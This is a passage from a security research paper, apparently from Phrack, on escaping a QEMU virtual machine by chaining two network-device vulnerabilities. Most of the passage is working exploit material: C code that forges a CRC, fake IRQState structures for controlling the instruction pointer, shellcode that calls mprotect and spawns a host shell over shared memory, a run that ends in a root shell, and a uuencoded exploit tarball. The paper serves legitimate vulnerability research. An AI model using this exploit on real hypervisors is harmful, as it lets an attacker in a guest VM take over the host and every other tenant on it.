Thanks to the ideas exposed in [6], we
+can apply a 4-byte patch to our packet so that the computed CRC matches a
+value of our choice. The source code reverse-crc.c applies a patch to a
+pre-filled buffer so that the computed CRC is equal to 0xdeadbeef.
+
+---[ reverse-crc.c ]---
+#include <stdio.h>
+#include <stdint.h>
+
+#define CRC(crc, ch) (crc = (crc >> 8) ^ crctab[(crc ^ (ch)) & 0xff])
+
+/* generated using the AUTODIN II polynomial
+ *    x^32 + x^26 + x^23 + x^22 + x^16 +
+ *    x^12 + x^11 + x^10 + x^8 + x^7 + x^5 + x^4 + x^2 + x^1 + 1
+ */
+static const uint32_t crctab[256] = {
+    0x00000000, 0x77073096, 0xee0e612c, 0x990951ba,
+    0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3,
+    0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988,
+    0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91,
+    0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de,
+    0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7,
+    0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec,
+    0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5,
+    0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172,
+    0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b,
+    0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940,
+    0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59,
+    0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116,
+    0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f,
+    0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924,
+    0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d,
+    0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a,
+    0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433,
+    0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818,
+    0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01,
+    0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e,
+    0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457,
+    0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c,
+    0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65,
+    0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2,
+    0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb,
+    0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0,
+    0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9,
+    0x5005713c, 0x270241aa, 
0xbe0b1010, 0xc90c2086, + 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f, + 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, + 0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, + 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a, + 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, + 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8, + 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, + 0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, + 0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7, + 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc, + 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, + 0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, + 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b, + 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, + 0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79, + 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, + 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, + 0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, + 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d, + 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, + 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713, + 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, + 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, + 0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e, + 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777, + 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, + 0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, + 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2, + 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, + 0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0, + 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9, + 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, + 0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf, + 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94, + 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d, +}; + +uint32_t crc_compute(uint8_t *buffer, size_t size) +{ + uint32_t fcs = ~0; + uint8_t *p = buffer; + + while (p != &buffer[size]) + CRC(fcs, *p++); + + return fcs; +} + +uint32_t crc_reverse(uint32_t current, uint32_t 
target)
+{
+    size_t i = 0, j;
+    uint8_t *ptr;
+    uint32_t workspace[2] = { current, target };
+    for (i = 0; i < 2; i++)
+        workspace[i] &= (uint32_t)~0;
+    ptr = (uint8_t *)(workspace + 1);
+    for (i = 0; i < 4; i++) {
+        j = 0;
+        while (crctab[j] >> 24 != *(ptr + 3 - i))
+            j++;
+        *((uint32_t *)(ptr - i)) ^= crctab[j];
+        *(ptr - i - 1) ^= j;
+    }
+    return *(uint32_t *)(ptr - 4);
+}
+
+
+int main()
+{
+    uint32_t fcs;
+    uint32_t buffer[2] = { 0xcafecafe };
+    uint8_t *ptr = (uint8_t *)buffer;
+
+    fcs = crc_compute(ptr, 4);
+    printf("[+] current crc = %#010x, required crc = %#010x\n",
+           fcs, 0xdeadbeef);
+
+    fcs = crc_reverse(fcs, 0xdeadbeef);
+    printf("[+] applying patch = %#010x\n", fcs);
+    buffer[1] = fcs;
+
+    fcs = crc_compute(ptr, 8);
+    if (fcs == 0xdeadbeef)
+        printf("[+] crc patched successfully\n");
+}
+
+----[ 4.4 - Exploit
+
+The exploit (file cve-2015-7504.c from the attached source code tarball)
+resets the card to its default settings, then configures Tx and Rx
+descriptors and sets the required flags, and finally inits and restarts
+the card to push our network card config.
+
+The rest of the exploit simply triggers the vulnerability and crashes QEMU
+with a single packet. As shown below, qemu_set_irq is called with a
+corrupted irq variable pointing to 0x7f66deadbeef. QEMU crashes as there
+is no runnable handler at this address.
+
+(gdb) shell ps -e | grep qemu
+ 8335 pts/4    00:00:03 qemu-system-x86
+(gdb) attach 8335
+...
+(gdb) c
+Continuing.
+Program received signal SIGSEGV, Segmentation fault.
+0x00007f669ce6c363 in qemu_set_irq (irq=0x7f66deadbeef, level=0)
+43          irq->handler(irq->opaque, irq->n, level);
+
+--[ 5 - Putting All Together
+
+In this section, we merge the two previous exploits in order to escape
+from the VM and get code execution on the host with QEMU's privileges.
+
+First, we exploit CVE-2015-5165 in order to reconstruct the memory layout
+of QEMU. 
More precisely, the exploit tries to resolve the following
+addresses in order to bypass ASLR:
+
+- The guest physical memory base address. In our exploit, we need to do
+  some allocations on the guest and get their precise address within the
+  virtual address space of QEMU.
+
+- The .text section base address. This serves to get the address of the
+  qemu_set_irq() function.
+
+- The .plt section base address. This serves to determine the addresses
+  of some functions such as fork() and execv() used to build our
+  shellcode. The address of mprotect() is also needed to change the
+  permissions of the guest physical address space. Remember that the
+  physical memory allocated for the guest is not executable.
+
+----[ 5.1 - RIP Control
+
+As shown in section 4, we have control over the %rip register. Instead of
+letting QEMU crash at an arbitrary address, we overflow the PCNET buffer
+with an address pointing to a fake IRQState that calls a function of our
+choice.
+
+At first sight, one could be tempted to build a fake IRQState that runs
+system(). However, this call will fail as some of QEMU's memory mappings
+are not preserved across a fork() call. More precisely, the mmap'ed
+physical memory is marked with the MADV_DONTFORK flag:
+
+qemu_madvise(new_block->host, new_block->max_length, QEMU_MADV_DONTFORK);
+
+Calling execv() is not useful either, as we would lose our hold on the
+guest machine.
+
+Note also that one can construct a shellcode by chaining several fake
+IRQState structures in order to call multiple functions, since
+qemu_set_irq() is called several times by the PCNET device emulator.
+However, we found that it's more convenient and more reliable to execute
+a shellcode after having enabled the PROT_EXEC flag on the memory page
+where the shellcode is located.
+
+Our idea is to build two fake IRQState structures. The first one is used
+to make a call to mprotect(). 
The second one is used to call a shellcode
+that will first undo the MADV_DONTFORK flag and then run an interactive
+shell between the guest and the host.
+
+As stated earlier, when qemu_set_irq() is called, it takes two parameters
+as input: irq (a pointer to an IRQState structure) and level (the IRQ
+level), then calls the handler as follows:
+
+void qemu_set_irq(qemu_irq irq, int level)
+{
+    if (!irq)
+        return;
+
+    irq->handler(irq->opaque, irq->n, level);
+}
+
+As shown above, we have control only over the first two parameters. So
+how do we call mprotect(), which has three arguments?
+
+To overcome this, we will make qemu_set_irq() call itself first with the
+following parameters:
+
+- irq: pointer to a fake IRQState that sets the handler pointer to the
+  mprotect() function.
+- level: mprotect() flags set to PROT_READ | PROT_WRITE | PROT_EXEC
+
+This is achieved by setting up two fake IRQState structures, as shown in
+the following snippet of code:
+
+struct IRQState {
+    uint8_t  _nothing[44];
+    uint64_t handler;
+    uint64_t arg_1;
+    int32_t  arg_2;
+};
+
+struct IRQState fake_irq[2];
+hptr_t fake_irq_mem = gva_to_hva(fake_irq);
+
+/* do qemu_set_irq */
+fake_irq[0].handler = qemu_set_irq_addr;
+fake_irq[0].arg_1 = fake_irq_mem + sizeof(struct IRQState);
+fake_irq[0].arg_2 = PROT_READ | PROT_WRITE | PROT_EXEC;
+
+/* do mprotect */
+fake_irq[1].handler = mprotect_addr;
+fake_irq[1].arg_1 = (fake_irq_mem >> PAGE_SHIFT) << PAGE_SHIFT;
+fake_irq[1].arg_2 = PAGE_SIZE;
+
+After the overflow takes place, qemu_set_irq() is called with a fake
+handler that simply re-calls qemu_set_irq(), which in turn calls
+mprotect() after having adjusted the level parameter to 7 (the flags
+required by mprotect).
+
+The memory is now executable; we can pass control to our interactive
+shell by rewriting the handler of the first IRQState to the address of
+our shellcode:
+
+payload.fake_irq[0].handler = shellcode_addr;
+payload.fake_irq[0].arg_1 = shellcode_data;
+
+----[ 5.2 - Interactive Shell
+
+Well. 
We can simply write a basic shellcode that uses netcat to
+bind a shell to some port and then connect to that shell from a separate
+machine. That's a satisfactory solution, but we can do better to avoid
+firewall restrictions. We can leverage shared memory between the guest and
+the host to build a bindshell.
+
+Exploiting QEMU's vulnerabilities is a little bit subtle, as the code we
+are writing in the guest is already available in QEMU's process memory. So
+there is no need to inject a shellcode. Even better, we can share code and
+run it on both the guest and the attacked host.
+
+The following figure summarizes the shared memories and the
+processes/threads running on the host and the guest.
+
+We create two shared ring buffers (in and out) and provide read/write
+primitives with spin-lock access to those shared memory areas. On the host
+machine, we run a shellcode that starts a /bin/sh shell in a separate
+process after having first duplicated its stdin and stdout file
+descriptors. We also create two threads. The first one reads commands from
+the shared memory and passes them to the shell via a pipe. The second
+thread reads the output of the shell (from a second pipe) and then writes
+it to the shared memory.
+
+These two threads are also instantiated on the guest machine to write user
+input commands to the dedicated shared memory and to output the results
+read from the second ring buffer to stdout, respectively.
+
+Note that in our exploit, we have a third thread (and a dedicated shared
+area) to handle stderr output. 
+ + + GUEST SHARED MEMORY HOST + ----- ------------- ---- + +------------+ +------------+ + | exploit | | QEMU | + | (thread) | | (main) | + +------------+ +------------+ + + +------------+ +------------+ + | exploit | sm_write() head sm_read() | QEMU | + | (thread) |----------+ |--------------| (thread) | + +------------+ | V +---------++-+ + | xxxxxxxxxxxxxx----+ pipe IN || + | x | +---------++-+ + | x ring buffer | | shell | + tail ------>x (filled with x) ^ | fork proc. | + | | +---------++-+ + +-------->--------+ pipe OUT || + +------------+ +---------++-+ + | exploit | sm_read() tail sm_write() | QEMU | + | (thread) |----------+ |--------------| (thread) | + +------------+ | V +------------+ + | xxxxxxxxxxxxxx----+ + | x | + | x ring buffer | + head ------>x (filled with x) ^ + | | + +-------->--------+ + +----[ 5.3 - VM-Escape Exploit + +In the section, we outline the main structures and functions used in the +full exploit (vm-escape.c). + +The injected payload is defined by the following structure: + +struct payload { + struct IRQState fake_irq[2]; + struct shared_data shared_data; + uint8_t shellcode[1024]; + uint8_t pipe_fd2r[1024]; + uint8_t pipe_r2fd[1024]; +}; + +Where fake_irq is a pair of fake IRQState structures responsible to call +mprotect() and change the page protection where the payload resides. + +The structure shared_data is used to pass arguments to the main shellcode: + +struct shared_data { + struct GOT got; + uint8_t shell[64]; + hptr_t addr; + struct shared_io shared_io; + volatile int done; +}; + +Where the got structure acts as a Global Offset Table. It contains the +address of the main functions to run by the shellcode. The addresses of +these functions are resolved from the memory leak. 
+ +struct GOT { + typeof(open) *open; + typeof(close) *close; + typeof(read) *read; + typeof(write) *write; + typeof(dup2) *dup2; + typeof(pipe) *pipe; + typeof(fork) *fork; + typeof(execv) *execv; + typeof(malloc) *malloc; + typeof(madvise) *madvise; + typeof(pthread_create) *pthread_create; + typeof(pipe_r2fd) *pipe_r2fd; + typeof(pipe_fd2r) *pipe_fd2r; +}; + +The main shellcode is defined by the following function: + +/* main code to run after %rip control */ +void shellcode(struct shared_data *shared_data) +{ + pthread_t t_in, t_out, t_err; + int in_fds[2], out_fds[2], err_fds[2]; + struct brwpipe *in, *out, *err; + char *args[2] = { shared_data->shell, NULL }; + + if (shared_data->done) { + return; + } + + shared_data->got.madvise((uint64_t *)shared_data->addr, + PHY_RAM, MADV_DOFORK); + + shared_data->got.pipe(in_fds); + shared_data->got.pipe(out_fds); + shared_data->got.pipe(err_fds); + + in = shared_data->got.malloc(sizeof(struct brwpipe)); + out = shared_data->got.malloc(sizeof(struct brwpipe)); + err = shared_data->got.malloc(sizeof(struct brwpipe)); + + in->got = &shared_data->got; + out->got = &shared_data->got; + err->got = &shared_data->got; + + in->fd = in_fds[1]; + out->fd = out_fds[0]; + err->fd = err_fds[0]; + + in->ring = &shared_data->shared_io.in; + out->ring = &shared_data->shared_io.out; + err->ring = &shared_data->shared_io.err; + + if (shared_data->got.fork() == 0) { + shared_data->got.close(in_fds[1]); + shared_data->got.close(out_fds[0]); + shared_data->got.close(err_fds[0]); + shared_data->got.dup2(in_fds[0], 0); + shared_data->got.dup2(out_fds[1], 1); + shared_data->got.dup2(err_fds[1], 2); + shared_data->got.execv(shared_data->shell, args); + } + else { + shared_data->got.close(in_fds[0]); + shared_data->got.close(out_fds[1]); + shared_data->got.close(err_fds[1]); + + shared_data->got.pthread_create(&t_in, NULL, + shared_data->got.pipe_r2fd, in); + shared_data->got.pthread_create(&t_out, NULL, + shared_data->got.pipe_fd2r, out); + 
shared_data->got.pthread_create(&t_err, NULL,
+            shared_data->got.pipe_fd2r, err);
+
+        shared_data->done = 1;
+    }
+}
+
+The shellcode first checks the shared_data->done flag to avoid running
+multiple times (remember that qemu_set_irq(), which is used to pass
+control to the shellcode, is called several times by QEMU).
+
+The shellcode calls madvise() with shared_data->addr pointing to the
+physical memory. This is necessary to undo the MADV_DONTFORK flag and
+hence preserve memory mappings across fork() calls.
+
+The shellcode creates a child process that is responsible for starting a
+shell ("/bin/sh"). The parent process starts threads that make use of
+shared memory areas to pass shell commands from the guest to the attacked
+host and then write back the results of these commands to the guest
+machine. The communication between the parent and the child process is
+carried over pipes.
+
+As shown below, a shared memory area consists of a ring buffer that is
+accessed through the sm_read() and sm_write() primitives:
+
+struct shared_ring_buf {
+    volatile bool lock;
+    bool empty;
+    uint8_t head;
+    uint8_t tail;
+    uint8_t buf[SHARED_BUFFER_SIZE];
+};
+
+static inline
+__attribute__((always_inline))
+ssize_t sm_read(struct GOT *got, struct shared_ring_buf *ring,
+                char *out, ssize_t len)
+{
+    ssize_t read = 0, available = 0;
+
+    do {
+        /* spin lock */
+        while (__atomic_test_and_set(&ring->lock, __ATOMIC_RELAXED));
+
+        if (ring->head > ring->tail) { // loop on ring
+            available = SHARED_BUFFER_SIZE - ring->head;
+        } else {
+            available = ring->tail - ring->head;
+            if (available == 0 && !ring->empty) {
+                available = SHARED_BUFFER_SIZE - ring->head;
+            }
+        }
+        available = MIN(len - read, available);
+
+        imemcpy(out, ring->buf + ring->head, available);
+        read += available;
+        out += available;
+        ring->head += available;
+
+        if (ring->head == SHARED_BUFFER_SIZE)
+            ring->head = 0;
+
+        if (available != 0 && ring->head == ring->tail)
+            ring->empty = true;
+
+        __atomic_clear(&ring->lock, 
__ATOMIC_RELAXED);
+    } while (available != 0 || read == 0);
+
+    return read;
+}
+
+static inline
+__attribute__((always_inline))
+ssize_t sm_write(struct GOT *got, struct shared_ring_buf *ring,
+                 char *in, ssize_t len)
+{
+    ssize_t written = 0, available = 0;
+
+    do {
+        /* spin lock */
+        while (__atomic_test_and_set(&ring->lock, __ATOMIC_RELAXED));
+
+        if (ring->tail > ring->head) { // loop on ring
+            available = SHARED_BUFFER_SIZE - ring->tail;
+        } else {
+            available = ring->head - ring->tail;
+            if (available == 0 && ring->empty) {
+                available = SHARED_BUFFER_SIZE - ring->tail;
+            }
+        }
+        available = MIN(len - written, available);
+
+        imemcpy(ring->buf + ring->tail, in, available);
+        written += available;
+        in += available;
+        ring->tail += available;
+
+        if (ring->tail == SHARED_BUFFER_SIZE)
+            ring->tail = 0;
+
+        if (available != 0)
+            ring->empty = false;
+
+        __atomic_clear(&ring->lock, __ATOMIC_RELAXED);
+    } while (written != len);
+
+    return written;
+}
+
+These primitives are used by the following thread functions. The first one
+reads data from a shared memory area and writes it to a file descriptor.
+The second one reads data from a file descriptor and writes it to a shared
+memory area.
+
+void *pipe_r2fd(void *_brwpipe)
+{
+    struct brwpipe *brwpipe = (struct brwpipe *)_brwpipe;
+    char buf[SHARED_BUFFER_SIZE];
+    ssize_t len;
+
+    while (true) {
+        len = sm_read(brwpipe->got, brwpipe->ring, buf, sizeof(buf));
+        if (len > 0)
+            brwpipe->got->write(brwpipe->fd, buf, len);
+    }
+
+    return NULL;
+} SHELLCODE(pipe_r2fd)
+
+void *pipe_fd2r(void *_brwpipe)
+{
+    struct brwpipe *brwpipe = (struct brwpipe *)_brwpipe;
+    char buf[SHARED_BUFFER_SIZE];
+    ssize_t len;
+
+    while (true) {
+        len = brwpipe->got->read(brwpipe->fd, buf, sizeof(buf));
+        if (len < 0) {
+            return NULL;
+        } else if (len > 0) {
+            len = sm_write(brwpipe->got, brwpipe->ring, buf, len);
+        }
+    }
+
+    return NULL;
+}
+
+Note that the code of these functions is shared between the host and the
+guest. 
These threads are also instantiated in the guest machine to read
+user input commands and copy them to the dedicated shared memory area (the
+in shared memory), and to write back the output of these commands
+available in the corresponding shared memory areas (the out and err shared
+memories):
+
+void session(struct shared_io *shared_io)
+{
+    size_t len;
+    pthread_t t_in, t_out, t_err;
+    struct GOT got;
+    struct brwpipe *in, *out, *err;
+
+    got.read = &read;
+    got.write = &write;
+
+    warnx("[!] enjoy your shell");
+    fputs(COLOR_SHELL, stderr);
+
+    in = malloc(sizeof(struct brwpipe));
+    out = malloc(sizeof(struct brwpipe));
+    err = malloc(sizeof(struct brwpipe));
+
+    in->got = &got;
+    out->got = &got;
+    err->got = &got;
+
+    in->fd = STDIN_FILENO;
+    out->fd = STDOUT_FILENO;
+    err->fd = STDERR_FILENO;
+
+    in->ring = &shared_io->in;
+    out->ring = &shared_io->out;
+    err->ring = &shared_io->err;
+
+    pthread_create(&t_in, NULL, pipe_fd2r, in);
+    pthread_create(&t_out, NULL, pipe_r2fd, out);
+    pthread_create(&t_err, NULL, pipe_r2fd, err);
+
+    pthread_join(t_in, NULL);
+    pthread_join(t_out, NULL);
+    pthread_join(t_err, NULL);
+}
+
+The figure presented in the previous section illustrates the shared
+memories and the processes/threads started in the guest and the host
+machines.
+
+The exploit targets a vulnerable version of QEMU built with GCC 4.9.2. 
In order to adapt the exploit
+to a specific QEMU build, we provide a shell script (build-exploit.sh)
+that will output a C header with the required offsets:
+
+  $ ./build-exploit > qemu.h
+
+Running the full exploit (vm-escape.c) will result in the following
+output:
+
+  $ ./vm-escape
+  $ exploit: [+] found 190 potential ObjectProperty structs in memory
+  $ exploit: [+] .text mapped at 0x7fb6c55c3620
+  $ exploit: [+] mprotect mapped at 0x7fb6c55c0f10
+  $ exploit: [+] qemu_set_irq mapped at 0x7fb6c5795347
+  $ exploit: [+] VM physical memory mapped at 0x7fb630000000
+  $ exploit: [+] payload at 0x7fb6a8913000
+  $ exploit: [+] patching packet ...
+  $ exploit: [+] running first attack stage
+  $ exploit: [+] running shellcode at 0x7fb6a89132d0
+  $ exploit: [!] enjoy your shell
+  $ shell > id
+  $ uid=0(root) gid=0(root) ...
+
+----[ 5.4 - Limitations
+
+Please note that the current exploit is still somewhat unreliable. In our
+testing environment (Debian 7 running a 3.16 kernel on the x86_64 arch),
+we have observed a failure rate of approximately 1 in 10 runs. In most
+unsuccessful attempts, the exploit fails to reconstruct the memory layout
+of QEMU due to unusable leaked data.
+
+The exploit does not work on Linux kernels compiled without the
+CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE flag. In this case, the QEMU binary
+(compiled by default with -fPIE) is mapped at a separate address range, as
+shown by the following listing:
+
+55e5e3fdd000-55e5e4594000 r-xp 00000000 fe:01 6940407 [qemu-system-x86_64]
+55e5e4794000-55e5e4862000 r--p 005b7000 fe:01 6940407 ...
+55e5e4862000-55e5e48e3000 rw-p 00685000 fe:01 6940407 ...
+55e5e48e3000-55e5e4d71000 rw-p 00000000 00:00 0
+55e5e6156000-55e5e7931000 rw-p 00000000 00:00 0 [heap]
+
+7fb80b4f5000-7fb80c000000 rw-p 00000000 00:00 0
+7fb80c000000-7fb88c000000 rw-p 00000000 00:00 0 [2 GB of RAM]
+7fb88c000000-7fb88c915000 rw-p 00000000 00:00 0
+ ... 
+7fb89b6a0000-7fb89b6cb000 r-xp 00000000 fe:01 794385 [first shared lib]
+7fb89b6cb000-7fb89b8cb000 ---p 0002b000 fe:01 794385 ...
+7fb89b8cb000-7fb89b8cc000 r--p 0002b000 fe:01 794385 ...
+7fb89b8cc000-7fb89b8cd000 rw-p 0002c000 fe:01 794385 ...
+ ...
+7ffd8f8f8000-7ffd8f91a000 rw-p 00000000 00:00 0 [stack]
+7ffd8f970000-7ffd8f972000 r--p 00000000 00:00 0 [vvar]
+7ffd8f972000-7ffd8f974000 r-xp 00000000 00:00 0 [vdso]
+ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
+
+As a consequence, our 4-byte overflow is not sufficient to redirect the
+irq pointer (originally located in the heap somewhere at 0x55xxxxxxxxxx)
+so that it points to our fake IRQState structure (injected somewhere at
+0x7fxxxxxxxxxx).
+
+--[ 6 - Conclusions
+
+In this paper, we have presented two exploits on QEMU's network device
+emulators. The combination of these exploits makes it possible to break
+out of a VM and execute code on the host.
+
+During this work, we have probably crashed our testing VM more than one
+thousand times. It was tedious to debug unsuccessful exploit attempts,
+especially with a complex shellcode that spawns several threads and
+processes. We hope that we have provided sufficient technical details
+and generic techniques that can be reused for further exploitation of
+QEMU.
+
+--[ 7 - Greets
+
+We would like to thank Pierre-Sylvain Desse for his insightful comments.
+Greets to coldshell and Kevin Schouteeten for helping us test on various
+environments.
+
+Thanks also to Nelson Elhage for his seminal work on VM-escape.
+
+And a big thanks to the reviewers of the Phrack Staff for challenging us
+to improve the paper and the code. 
+ +--[ 8 - References + +[1] http://venom.crowdstrike.com +[2] media.blackhat.com/bh-us-11/Elhage/BH_US_11_Elhage_Virtunoid_WP.pdf +[3] https://github.com/nelhage/virtunoid/blob/master/virtunoid.c +[4] http://lettieri.iet.unipi.it/virtualization/2014/Vtx.pdf +[5] https://www.kernel.org/doc/Documentation/vm/pagemap.txt +[6] https://blog.affien.com/archives/2005/07/15/reversing-crc/ + +--[ 9 - Source Code + +begin 644 vm_escape.tar.gz +M'XL(`"[OTU@``^Q:Z7,:29;W5_%7Y*AC.L"-IC8V=^B"*S'?^WI$OL3]-1W:EY<(> +M/_O3'@I/FB3^DZ4)W?V\>YZQF`J>BC3FXAEE4$/)N6 +M_".:I#[^,=!`!C"(?PS?GA'Z +MIUBS]_P_C_]7XYF>K(TEKU:E&<^/KE]7=I>6X]G5_IH9S\I':Y.Q>KCF]*R< +M/%R2JY5=[K&"K/)V85=^M?*5L6X\L^2B\:88#<[:IT-"6+2WW/[W@A!29>35 +MJQW"VI;JM#NZZ!>#HCL$JO5DX@E%O$=PVB7^J=Y3)$F-O""L5JF`2<29EY7* +M&M[B:%22A;RRH[ES*UM6[Q>E,*%[.TY7HYPR7RM1>Z9QQ*?EGY+<@4 +M'-BO/LE1.1]=N5GUTWQLR/,[>0?W)(NIK1,@>%DY6(W_P\)*L`&^AQ?R'>CR +MY(MR.2IKJ/[U:Y+7P(C_3(%LLK+VYZHS]0UGG0R*XNUH4`S!FH.EE08WOT9- +MF5\;.U+]2Q6^@X@=)&NURL'!QLL7#.C`+-"^0W?:18E(@38_Y>Q"_JZS0>`. 
+M*D@",D/65/W^7[X#Y;6M'ES<0_H?#Z)5O9-?VXC[+<1W*L>SZKT!&>A_#AB^ +MW`4?()W:*:3!@3-@V7QA9]7#X\5RKH]7=N*.O9JI7!S626_4;_6ZG8]W^`'] +M*T)K!*0?+.QR.5]6#SW[H2@"T'H`:$3^5D,M?5*!%^'GDU[_X&;.K!^]]N5_]Z_LG/ +M]OS_-'T1WO[I4\`?G_]I$D7L;OY+$K_.>)S2?YW__Q//\?-*<[ZX78ZOKDM2 +MU34242;JY-Q>FS$9>I?KY$*N)^14+L<6NE2E`>9+_)ROR\IT +M;L8.>I,74"<2NAXTS^FX+*TAT'8_C0V\E-?0K*:^A +M14Y`DA>PJVMF]@P!=7HBQU.[!$"BQP:`HAT$[@P`U\P:C'K"ALK&!O+?L8$$ +MORIFKM=3.ROE76".`?,Y["SAV"GMSC6!%0@QT#@&%*,.-A`'"JKN2M_\9'>)`Y9+:SVF0-,8Y]/2Y\SLY`]JU6P +M?WC6'I!![W3XOM$O"+Q?]'OOVJVB14X^DN%909J]BX_]]INS(3GK=5I%?T`: +MW1:L=H?]]LGEL`<+AXT!K59[T.PTVN=%ZPBT@T92 +MO/-C\."LT>D\Z:6W_8&/)T6ETVZ<=(J@";QLM?M%<^C=V;XU`3FPKP/SY$71 +M;/N7XD,!SC3Z'V$>ZE=`YJ#XMTL@@DW2:IS#A#8@U<]``C%I7O:+Z-?#\/<`"?C>`M87H]KKH*B#4ZW_T0CT&"'Z=O#\K +M8!U"W*T@4@T/P0`0:PYWR4`?`#C<\9%TBS>=]INBVRS\;L]+>=\>%#6(57O@ +M"=I![?L&Z+ST+F.,P*KPNI.Q=8PD:9^21NM=VYL=B"L0^T%[DR>P-+ALGFW@ +M/JH\/Z[L7M)N5\>/+GBP-IW*6;A];2]JRX4\AJM2^?G[&XRWG[WW[=[QMJN3 +M,?3VO;5%>>TO)8]NEVH^GWS1-?3Q#?;QS?2I6^UZ!NW./(3A\.]VNCZZ/GSZ +M7NJ?W[F;DB^^GP;*S]Q1?^>>>D]Z]G'4;YS?D]*;;//#RM9PO!+)R?AJ!IUT +M-))E:,5V-*I6-\O5>P]JM:WP<(V:N^H*[H[3&O"J]7A2CF>CO9U[#A]I:/FC +M47@9C;96G+>[55DGJD:JOY(?*N3))[!5)>B2_GXK:R\_1PL"1\K3JC^@!6FO +M/=G?_)]OX>M+\EMM:QNTR'[1&IU#LZ;WP`>*,'T#;/ +M+KMOD0&V!V_AW@V!VMGN=7H@[ZR`!GSX`XWC[V/VDK+IZAJ&*?Q.Z10L.]PU +M!8B;O591]0>HQURNIA"IK_S7PQ$_H&CA-@;.-9G1%_#8(L']5=?$<_V +M_8\OG]`RNF@TWU87\G8REZ9.@LY??X!KZ.9'!S35CTPCO^!Q#G?XVJYLR,G= +M96_>`5P@_3WVZSOAM1>O_5[04=^3BQ[]]J1]G6&P\6H.J;:8P!^WGL&H"M]? 
